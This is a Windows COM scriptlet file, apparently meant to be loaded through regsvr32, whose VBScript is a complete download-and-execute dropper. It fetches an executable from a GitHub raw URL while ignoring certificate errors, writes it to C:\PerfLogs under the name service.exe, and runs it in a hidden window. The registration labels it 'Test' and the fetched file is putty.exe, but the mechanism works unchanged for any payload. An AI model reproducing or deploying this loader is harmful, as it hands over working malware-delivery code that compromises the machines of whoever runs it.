<?XML version="1.0"?>
<scriptlet>

<registration
    description="Test"
    progid="Test"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>

<script language="VBScript">
		<![CDATA[
	
			Const adTypeBinary = 1
			Const adSaveCreateOverWrite = 2
			Dim http,ado
			Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
			http.SetOption 2, 13056
			http.open "GET","https://github.com/c0mp4s5/test/raw/master/putty.exe",False
			http.send
			Set ado = createobject("Adodb.Stream")
			ado.Type = adTypeBinary
			ado.Open
			ado.Write http.responseBody
			ado.SaveToFile "C:\PerfLogs\service.exe"
			ado.Close
			CreateObject("WScript.Shell").Run "C:\PerfLogs\service.exe",0,true 
	
		]]>
		
</script>

</scriptlet>



